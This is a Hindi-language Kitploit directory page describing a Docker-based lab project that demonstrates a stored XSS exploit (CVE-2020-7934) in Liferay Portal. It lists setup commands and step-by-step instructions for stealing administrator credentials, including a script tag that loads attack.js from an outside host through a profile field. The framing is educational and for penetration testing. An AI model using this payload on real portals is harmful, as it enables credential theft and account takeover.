Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
audit-xss-cve-2020-7934 — CVE-2020-7934 को लक्ष्य करने वाले Liferay पोर्टल के लिए Docker-आधारित XSS शोषण। उपयोगकर्ता प्रोफ़ाइल फ़ील्ड के माध्यम से stored cross-site scripting का प्रदर्शन करके व्यवस्थापक क्रेडेंशियल चुराना। | Kitploit
उपकरण/GitHubGitHub/giardinas-dev/audit-xss-cve-2020-7934
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgiardinas-dev/audit-xss-cve-2020-7934

audit-xss-cve-2020-7934

CVE-2020-7934 को लक्ष्य करने वाले Liferay पोर्टल के लिए Docker-आधारित XSS शोषण। उपयोगकर्ता प्रोफ़ाइल फ़ील्ड के माध्यम से stored cross-site scripting का प्रदर्शन करके व्यवस्थापक क्रेडेंशियल चुराना।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4 साल पहलेअभी तक समीक्षित नहीं

CVE 2020-7934

CVE कैसे चलाएं

आवश्यकताएँ

  1. docker

टिप्पणियाँ

हमले की स्क्रिप्ट को ऑनलाइन रखना संभव है (js कोड दिया गया है) http://yourjavascript.com/ हमारी Js स्क्रिप्ट हमले के लिए ऑनलाइन html <script src="http://yourjavascript.com/920172199111/attack.js"></script>

कॉन्फ़िगरेशन के लिए कमांड

  1. इस प्रोजेक्ट की रूट फ़ोल्डर में जाएं
  2. "sudo docker-compose up --build" चलाएं
  3. नया टर्मिनल: "docker inspect liferay" चलाएं ==> और IPAddress मान कॉपी करें
  4. नया टर्मिनल: "python api_attacker.py" चलाएं
  5. ब्राउज़र खोलें और "http://IPAddress:8080" पर जाएं ==> आपको liferay पोर्टल प्रतिक्रिया के रूप में मिलना चाहिए
  6. कंटेनर रोकने और हटाने के लिए "sudo docker-compose rm" का उपयोग करें

हमले के निर्देश

  1. liferay में एक उपयोगकर्ता के रूप में पंजीकरण करें, लॉग इन करें, और "उपलब्ध साइट्स" अनुभाग में, "liferay" साइट में शामिल हों।
  2. JS स्क्रिप्ट में "अंतिम नाम" बदलें (सीधे () या "src =" http ... "" के माध्यम से)
  3. liferay व्यवस्थापक के रूप में लॉग इन करें (उपयोगकर्ता नाम: [email protected], पासवर्ड: test)
  4. उपलब्ध साइट्स पर जाएं और "liferay" पर क्लिक करें, इस साइट का सार्वजनिक पृष्ठ खुल जाएगा।
  5. नए पृष्ठ पर जाएं, दाईं ओर एक मेनू खुलेगा, सदस्यता पर क्लिक करें।
  6. चरण 1 में पंजीकृत उपयोगकर्ता का चयन करें। उस समय स्क्रिप्ट निष्पादित हो जाएगी। 5.1) स्क्रिप्ट attack.js में पृष्ठ क्रेडेंशियल्स मांगेगा।
  7. चरण 5 (कॉन्फ़िगरेशन के कमांड का) के टर्मिनल में 5.1 में डाले गए उपयोगकर्ता नाम/पासवर्ड मुद्रित होंगे (व्यवस्थापक द्वारा)
टूल डाउनलोड करें